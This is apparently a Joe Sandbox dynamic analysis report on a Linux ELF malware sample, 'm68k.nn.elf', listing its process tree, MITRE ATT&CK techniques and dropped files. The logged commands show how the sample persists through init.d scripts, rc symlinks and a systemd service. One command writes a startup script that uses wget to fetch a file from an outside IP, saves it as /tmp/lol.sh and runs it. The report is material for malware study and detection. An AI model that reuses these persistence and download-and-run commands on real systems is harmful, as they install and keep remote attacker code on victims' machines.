Analysis Process: sh PID: 6287, Parent PID: 6269

General

Start time (UTC):	10:22:58
Start date (UTC):	27/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 6287, Parent PID: 6269

General

Start time (UTC):	10:22:58
Start date (UTC):	27/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable custom.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: m68k.nn.elf PID: 6324, Parent PID: 6238

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/tmp/m68k.nn.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: sh PID: 6324, Parent PID: 6238

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6326, Parent PID: 6324

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: chmod PID: 6326, Parent PID: 6324

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/system
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Chronological Activities

Analysis Process: m68k.nn.elf PID: 6327, Parent PID: 6238

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/tmp/m68k.nn.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: sh PID: 6327, Parent PID: 6238

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6333, Parent PID: 6327

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: ln PID: 6333, Parent PID: 6327

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/system /etc/rcS.d/S99system
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Chronological Activities

Analysis Process: m68k.nn.elf PID: 6334, Parent PID: 6238

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/tmp/m68k.nn.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: sh PID: 6334, Parent PID: 6238

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/bin/sh
Arguments:	sh -c "echo \"#!/bin/sh\n# /etc/init.d/m68k.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting m68k.nn.elf'\n /tmp/m68k.nn.elf &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping m68k.nn.elf'\n killall m68k.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/m68k.nn.elf"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: m68k.nn.elf PID: 6338, Parent PID: 6238

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/tmp/m68k.nn.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: sh PID: 6338, Parent PID: 6238

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/m68k.nn.elf >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6354, Parent PID: 6338

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: chmod PID: 6354, Parent PID: 6338

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/m68k.nn.elf
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Chronological Activities

Analysis Process: m68k.nn.elf PID: 6355, Parent PID: 6238

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/tmp/m68k.nn.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: sh PID: 6355, Parent PID: 6238

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/bin/sh
Arguments:	sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6360, Parent PID: 6355

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: mkdir PID: 6360, Parent PID: 6355

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/usr/bin/mkdir
Arguments:	mkdir -p /etc/rc.d
File size:	88408 bytes
MD5 hash:	088c9d1df5a28ed16c726eca15964cb7

Chronological Activities

Analysis Process: m68k.nn.elf PID: 6361, Parent PID: 6238

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/tmp/m68k.nn.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: sh PID: 6361, Parent PID: 6238

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6366, Parent PID: 6361

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: ln PID: 6366, Parent PID: 6361

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Chronological Activities

Analysis Process: m68k.nn.elf PID: 6367, Parent PID: 6238

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/tmp/m68k.nn.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: udisksd PID: 6249, Parent PID: 799

General

Start time (UTC):	10:22:58
Start date (UTC):	27/11/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 6249, Parent PID: 799

General

Start time (UTC):	10:22:58
Start date (UTC):	27/11/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Chronological Activities

Analysis Process: udisksd PID: 6289, Parent PID: 799

General

Start time (UTC):	10:22:58
Start date (UTC):	27/11/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 6289, Parent PID: 799

General

Start time (UTC):	10:22:58
Start date (UTC):	27/11/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Chronological Activities

Analysis Process: systemd PID: 6291, Parent PID: 6290

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 6291, Parent PID: 6290

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: gnome-session-binary PID: 6292, Parent PID: 1477

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/usr/libexec/gnome-session-binary
Arguments:	-
File size:	334664 bytes
MD5 hash:	d9b90be4f7db60cb3c2d3da6a1d31bfb

Chronological Activities

Analysis Process: sh PID: 6292, Parent PID: 1477

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/bin/sh
Arguments:	/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: gsd-housekeeping PID: 6292, Parent PID: 1477

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/usr/libexec/gsd-housekeeping
Arguments:	/usr/libexec/gsd-housekeeping
File size:	51840 bytes
MD5 hash:	b55f3394a84976ddb92a2915e5d76914

Chronological Activities

Analysis Process: gdm3 PID: 6337, Parent PID: 1320

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/usr/sbin/gdm3
Arguments:	-
File size:	453296 bytes
MD5 hash:	2492e2d8d34f9377e3e530a61a15674f

Chronological Activities

Analysis Process: Default PID: 6337, Parent PID: 1320

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/etc/gdm3/PrimeOff/Default
Arguments:	/etc/gdm3/PrimeOff/Default
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: gdm3 PID: 6353, Parent PID: 1320

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/usr/sbin/gdm3
Arguments:	-
File size:	453296 bytes
MD5 hash:	2492e2d8d34f9377e3e530a61a15674f

Chronological Activities

Analysis Process: Default PID: 6353, Parent PID: 1320

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/etc/gdm3/PrimeOff/Default
Arguments:	/etc/gdm3/PrimeOff/Default
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: udisksd PID: 6376, Parent PID: 799

General

Start time (UTC):	10:22:59
Start date (UTC):	27/11/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 6376, Parent PID: 799

General

Start time (UTC):	10:23:00
Start date (UTC):	27/11/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Chronological Activities

Analysis Process: udisksd PID: 6422, Parent PID: 799

General

Start time (UTC):	10:23:00
Start date (UTC):	27/11/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 6422, Parent PID: 799

General

Start time (UTC):	10:23:00
Start date (UTC):	27/11/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Chronological Activities

Analysis Process: udisksd PID: 6423, Parent PID: 799

General

Start time (UTC):	10:23:00
Start date (UTC):	27/11/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 6423, Parent PID: 799

General

Start time (UTC):	10:23:00
Start date (UTC):	27/11/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report m68k.nn.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/boot/bootcmd

/etc/init.d/m68k.nn.elf

/etc/init.d/system

/etc/inittab

/etc/motd

/etc/profile

/etc/rc.local

/etc/systemd/system/custom.service

/memfd:snapd-env-generator (deleted)

/run/user/127/dconf/user

/tmp/qemu-open.ehO1mT (deleted)

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

System Behavior

Analysis Process: m68k.nn.elf PID: 6238, Parent PID: 6158

General

Chronological Activities

Analysis Process: m68k.nn.elf PID: 6255, Parent PID: 6238

General

Chronological Activities

Analysis Process: m68k.nn.elf PID: 6269, Parent PID: 6238

Linux Analysis Report
m68k.nn.elf